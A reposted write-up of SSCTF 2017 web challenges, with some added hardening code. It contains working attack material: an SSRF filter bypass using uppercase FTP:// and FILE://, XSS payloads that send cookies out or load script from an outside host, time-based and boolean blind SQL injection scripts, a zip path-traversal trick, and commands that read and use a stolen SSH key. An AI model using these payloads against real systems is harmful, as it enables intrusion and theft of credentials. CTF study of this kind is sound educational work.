SSCTF-2017-web-writeup
Two days of hard work.
撿嗎(web100)
The challenge tip already describes the process.
web100 SSRF chain: http://120.132.21.19/ -> 10.23.173.190/news.php -> ftp://172.17.0.2
URL scheme names are case-insensitive, so a filter that only matches the lowercase scheme is bypassed by writing it in uppercase, e.g. FTP://.
The attack chain is somewhat involved, and with so many contestants brute-forcing the same target at once it was painful to work through.
About the ftp hop: the usual trick of connecting to a service through gopher and deciding whether a port is open from whether any data comes back does not work for ftp. At the time I also considered using timeouts for the port check (connecting to a service without sending anything keeps the connection hanging).
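The scheme-filter bypass behind the web100 chain, as an added example that is not code from the write-up or the challenge: a deny-list that compares the scheme case-sensitively lets FTP:// through, whereas parsing the URL and allow-listing the lower-cased scheme does not. The two news.php?url= hop URLs are the ones above; the deny-list contents are an assumption (the real filter's list is not in the write-up), and the private-address check is an extra step the write-up does not mention.

```python
"""Added example (not the write-up's code): case-insensitive scheme filtering and nested SSRF hops."""
import ipaddress
from urllib.parse import quote, urlparse

BLOCKED_SCHEMES = {"ftp", "file", "gopher", "dict"}   # assumed deny-list, not the target's actual one


def naive_is_blocked(url: str) -> bool:
    """Deny-list with a case-sensitive prefix match: 'FTP://' and 'FILE:///' slip straight through."""
    return any(url.startswith(s + "://") for s in BLOCKED_SCHEMES)


def hardened_is_blocked(url: str) -> bool:
    """Allow-list after parsing. urlsplit already lower-cases the scheme (RFC 3986 schemes are
    case-insensitive); the explicit lower() documents that the comparison must be case-blind.
    Literal private/loopback/link-local addresses are refused too, because the chain above reaches
    10.23.173.190 over plain http. A hostname still needs resolve-then-check at connect time (not shown)."""
    p = urlparse(url)
    if p.scheme.lower() not in {"http", "https"}:
        return True
    try:
        ip = ipaddress.ip_address(p.hostname or "")
    except ValueError:
        return False          # not an IP literal; must be checked after DNS resolution
    return ip.is_private or ip.is_loopback or ip.is_link_local


def build_chain(hops, inner: str, encode: bool = True) -> str:
    """Nest `inner` inside each SSRF entry point, outermost hop first.
    With encode=True each layer is percent-encoded once, so every server decodes exactly one layer.
    The write-up passes the inner URL raw (encode=False), which works only while it contains no '&' or '#'."""
    url = inner
    for hop in reversed(hops):
        url = hop + (quote(url, safe="") if encode else url)
    return url


if __name__ == "__main__":
    hops = ["http://120.132.21.19/news.php?url=", "http://10.23.173.190/news.php?url="]
    for u in ("ftp://172.17.0.2", "FTP://172.17.0.2"):
        print(u, "naive blocks:", naive_is_blocked(u), "hardened blocks:", hardened_is_blocked(u))
    print(build_chain(hops, "FTP://172.17.0.2", encode=False))
    print(build_chain(hops, "FILE:///var/www/admin/js.php"))
```

The allow-list is the important half: a deny-list has to enumerate every wrapper PHP supports (ftp, file, gopher, dict, php, phar, ...) and every spelling of each, while an allow-list only has to name the two schemes the feature actually needs.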
彈幕(web200)
The danmaku (bullet comments) are sent over WebSockets, so here you could essentially just sit and wait for someone's payload to arrive.
<img src="/static/images/welcome.gif" onload="c=encodeURIComponent(document.cookie);if(c.length>32){a=new Image();a.src='/xssHentai/request/1/?body='+c;}">
This shows that JS can be executed from an img tag.
<img src="x" onerror=jQuery.getScript(String.fromCharCode(104,116,116,112,115,58,47,47,120,46,115,101,99,98,111,120,46,99,110,47,116,85,74,89,67,52))>
Submitted like this (the String.fromCharCode sequence decodes to https://x.secbox.cn/tUJYC4). Honestly it was confusing: the danmaku stream was full of other contestants' XSS payloads, and the flag seemingly arrived out of nowhere.
白嗎(web300)
Without web1's FILE:// scheme to pull this challenge's source (/var/www/submit.php), I'd probably still be stuck on the fake injection, the fake admin backend, the fake zip, the fake probe, the fake phpMyAdmin... all fakes.
```php
<?php
header("CONTENT-TYPE:text/html;charset=UTF-8");
define("HOST", "127.0.0.1");
define("USERNAME", "root");
define("PASSWORD", "");
$con = new mysqli(HOST, USERNAME, PASSWORD, "ctf1");
if (!$con) {
    echo $con->error;
    exit("aaaa");
}
if (!$con->select_db("ctf1")) {
    echo $con->error;
}
if (!$con->query("SET NAMES utf8")) {
    echo $con->error;
}
// the 'xss' column is escaped ...
$xss = $_POST["sub"];
$str = addslashes($xss);

class Action
{
    function get_outer()
    {
        $url = 'http://www.ip138.com/ip2city.asp';
        $info = file_get_contents($url);
        preg_match('|<center>(.*?)</center>|i', $info, $m);
        return $m[1];
    }

    // ... but the "client IP" is taken from attacker-controlled headers, Client-IP first
    function get_inter()
    {
        $onlineip = '';
        if (getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
            $onlineip = getenv('HTTP_CLIENT_IP');
        } elseif (getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
            $onlineip = getenv('HTTP_X_FORWARDED_FOR');
        } elseif (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
            $onlineip = getenv('REMOTE_ADDR');
        } elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
            $onlineip = $_SERVER['REMOTE_ADDR'];
        }
        return $onlineip;
    }
}

$p = new Action();
$intip = $p->get_inter();
$outip2 = $intip;
@mkdir("/tmp/ids", 0777, true);
// $intip goes into the statement unescaped: time-based blind injection via the Client-IP header
$sql = "insert into ctf1(xss,ip,time,wai_ip) values('$str','$intip',NOW(),'$outip2')";
if ($str = $con->query($sql)) {
    echo "<script>alert('success');window.location.href='index.php'</script>";
    $insertid = mysqli_insert_id($con);
    file_put_contents("/tmp/ids/" . $insertid, "a");
} else {
    echo "<script>alert('fail');</script>";
}
?>
```
At first I took this for an injection challenge, and it is injectable: $str is passed through addslashes, but $intip, taken straight from the Client-IP / X-Forwarded-For headers, is concatenated into the INSERT unescaped. That gives a time-based blind injection:
```python
import requests
import sys

data = {}   # recovered characters, indexed by position


def exp(n):
    """Recover the n-th character of the subquery result through the time-based oracle."""
    global data
    for i in range(33, 127):
        #for ii in 'root':
        #i = ord(ii)
        flag = 1
        url = "http://120.132.20.149/submit.php"
        # 0x63746631 is 'ctf1'; hex literals avoid quotes inside the injected string
        sql = "select count(SCHEMA_NAME) from information_schema.SCHEMATA limit 1,1"
        sql = "select table_name from information_schema.TABLES where TABLE_SCHEMA=0x63746631 limit 0,1"
        #sql = "select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x63746631 and TABLE_NAME=0x63746631 limit 2,1"
        #sql = "select user from mysql.user limit 4,1"
        #sql = "select count(ip) from ctf1"
        # sent in the Client-IP header: get_inter() reads HTTP_CLIENT_IP first and the value is
        # concatenated into the INSERT unescaped; a matching character triggers sleep(2)
        payload = "A'-(if(ord(mid((%s),%d,1))=%d,sleep(2),1))-'" % (sql, n, i)
        print(payload)
        h = {'X-Forwarded-For': "A'", 'X-Forwarded': "A'", 'Client-IP': payload}
        r = requests.get(url, headers=h)
        try:
            res = requests.get(url, headers=h, timeout=2)
            #print(res.content)
        except requests.exceptions.RequestException:
            # the request timed out, i.e. sleep(2) fired: character found
            print(chr(i))
            data[n] = chr(i)
            print("Data %dth: %s" % (n, data[n]))
            flag = 0
            break
    if flag:
        sys.exit()


if __name__ == "__main__":
    for n in range(1, 64):
        exp(n)
```
Then, from the $xss variable in submit.php, I guessed the challenge was XSS. But!!! on the first day the bot seemed to be down, so nothing ever worked, and afterwards I kept wondering whether I could pwn the server itself since the MySQL root password was empty (connecting to MySQL through the SSRF; only an idea, mainly because the MySQL handshake is interactive, which makes it fail).
In the end I simply submitted a script tag through submit.php and received the data.
<script src=https://x.secbox.cn/tUJYC4></script>
b9557ee76eeb61cadda090855a47d266-1.php, then read the flag: http://120.132.21.19/news.php?url=10.23.173.190/news.php?url=FILE:///var/www/admin/js.php
Judging from the code, the intended solution was to obtain the source through the XSS; unfortunately web1 lets you go straight through.
WebHook(web500)
https://github.com/howmp/webhook
First, kudos to this challenge. Although I don't know what it was meant to test, I feel I solved it by a lucky shortcut.
The code's overall flow: a contestant adds a remote GitHub repository URL, then triggers a pull, and finally can download a zip of their own project.
During local testing, the debug error page leaked app.config['SECRET_KEY']; unfortunately debug was turned off later.
http://webhook.ssctf.seclover.com:8000/webhooklog: the pass there is the contestant's chosen password plus the app.config['SECRET_KEY'] value; after cracking a few of them I found that secret_key is simply ssctf.
First add the project: http://webhook.ssctf.seclover.com:8000/addrepo?repo=t&key=05dec173a9b6862b26b05f2b4d0c521a&url=https://github.com/l3m0n/t.git&pass=1234asdeqwasdasdqwsad12adsd
Then fetch and package it: POST to http://webhook.ssctf.seclover.com:8000/push with body {"repository":{"name" : "t"},"ref" : "refs/heads/master" }
The include list in the project's build.json controls which paths get zipped.
```python
import json
import os
import subprocess
import time

# excerpt from the webhook project: outpath and basedir are set by the caller
args = ['zip', '-r', os.path.join(outpath, str(int(time.time())) + '.zip')]
if os.path.isfile(os.path.join(basedir, 'build.json')):
    b = json.loads(open(os.path.join(basedir, 'build.json')).read())
    # every 'include' entry is handed to zip -r unchanged, so absolute or ../ paths escape the repo
    for x in b.get('include', [basedir]):
        args.append(x)
    for x in b.get('exclude', []):
        args.append("-x")
        args.append(x)
p = subprocess.Popen(args, cwd=basedir)
```
I downloaded what was under /var/www/; among it was a flag project, but git log showed nothing useful. A tip was released later, which was somewhat cryptic, but roughly it meant that the flag is not in the commits.
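Why an unchecked build.json include amounts to an arbitrary-file read, and what confining it to the checkout looks like, as an added example that is not the webhook project's own code. build_zip_args mirrors the argv construction quoted above; safe_includes is the hardened variant. The repository and output paths and the build.json contents are constructed for the example, and nothing is read from disk or executed.

```python
"""Added example (not the webhook project's code): unconfined vs. confined build.json includes."""
import json
import os


def build_zip_args(basedir: str, outpath: str, build_json_text, hardened: bool = False, ts: int = 0):
    """Mirror of the argv construction quoted from the project. With hardened=False the include
    entries go to `zip -r` untouched, so '/var/www' or '../' in a repo you control zips files
    outside the repo (which is exactly how /var/www was downloaded above)."""
    args = ["zip", "-r", os.path.join(outpath, f"{ts}.zip")]
    b = json.loads(build_json_text) if build_json_text is not None else {}
    includes = b.get("include", [basedir])
    if hardened:
        includes = safe_includes(basedir, includes)
    args.extend(includes)
    for x in b.get("exclude", []):
        args.extend(["-x", x])
    return args


def safe_includes(basedir: str, includes) -> list:
    """Resolve each include against the checkout root and refuse anything that escapes it.
    Results come back as './'-prefixed relative paths so an entry can never be parsed by zip
    as an option (e.g. an include named '-r')."""
    root = os.path.realpath(basedir)
    safe = []
    for inc in includes:
        if not isinstance(inc, str):
            raise ValueError(f"include must be a string: {inc!r}")
        resolved = os.path.realpath(os.path.join(root, inc))   # absolute inc replaces root here
        if os.path.commonpath([root, resolved]) != root:
            raise ValueError(f"include escapes the repository: {inc!r}")
        rel = os.path.relpath(resolved, root)
        safe.append("." if rel == "." else os.path.join(".", rel))
    return safe


if __name__ == "__main__":
    repo, out = "/srv/webhook/repos/t", "/srv/webhook/out"      # constructed paths
    evil = json.dumps({"include": ["/var/www", "../"]})          # constructed build.json
    print(build_zip_args(repo, out, evil, ts=1))                 # what the target would run
    try:
        build_zip_args(repo, out, evil, hardened=True, ts=1)
    except ValueError as e:
        print("rejected:", e)
    good = json.dumps({"include": ["src"], "exclude": ["*.pyc"]})
    print(build_zip_args(repo, out, good, hardened=True, ts=1))
```

realpath is applied to both sides so symlinks inside the checkout (a repo can ship one pointing at /etc) are resolved before the containment check, not after.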
The tip for the webhook challenge: the flag is in the flag project, but by the time the real flag was committed, the webhook had already been deleted. There was also a .bash_history, presumably left behind by an earlier player who had achieved command execution. The key commands extracted from it:
```sh
cat /home/www-data/.ssh/id_rsa
cat /home/www-data/.ssh/id_rsa.pub
ssh -T git@git.coding.net -i id_rsa
git clone https://git.coding.net/ljgame/flag.git
```
These are the steps for pulling the private repository with git, using the key left in /home/www-data/.ssh/.
Configure /root/.ssh/config:
```
Host ljgame.git.coding.net
    HostName git.coding.net
    User git
    IdentityFile /home/www-data/.ssh/id_rsa
```
then
```sh
ssh -T git@git.coding.net -i id_rsa
git clone git@ljgame.git.coding.net:ljgame/flag.git
```
Finally the private repository can be cloned and the flag obtained.
CloverSec Logos(web500)
http://60.191.205.80/picture.php?id=1 is injectable; spaces and or are filtered, but that is easy to bypass. Written up as a script:
```python
import requests
import sys

url = "http://60.191.205.80/picture.php?id="
#c = "0123456789abcedf"
# 'or' and spaces are stripped once, so write 'or' as 'oorr' and use parentheses / %0b instead of spaces
#sql = "select(column_name)from(infoorrmation_schema.columns)where(table_name)='user'%0blimit%0b2,1"
sql = "select(passwoorrd)from(user)where(username)='admin'"
f = 0
out = ""
for i in range(1, 200):
    print(i)
    f = 0
    for c in range(33, 128):
        # boolean oracle: a true condition selects the real row, a false one yields "not found!"
        payload = '0"||if(ascii(mid((' + sql + '),' + str(i) + ',1))=' + str(c) + ',1,0)||"a'
        #print(payload)
        res = requests.get(url + payload)
        if "not found!" not in res.text:
            print(c)
            out = out + chr(c)
            f = 1
            print(out)
            break
    if not f:
        print("output: " + out)
        sys.exit()
print("output: " + out)
```
Running it gives the admin password hash 14aceb3fc5992cef3d97 (20 characters); the other table name is Dede_CMS. DedeCMS stores substr(md5($pwd), 5, 20), so dropping the first 3 and the last 1 characters leaves the standard 16-character MD5; looking that up gives the password admin^g.
Two source leaks: index.php.swp and include.php.swp. The source very clearly unserializes input to read the flag file, with a few simple restrictions: the path can be prefixed with ./, your own server has to echo back 1234, and a + sign is inserted before the class-name length in the serialized string (unserialize accepts a signed length, which gets past a pattern such as O:\d+:). Final payload:
Reposted from: https://www.cnblogs.com/iamstudy/articles/ssctf-2017-web-writeup.html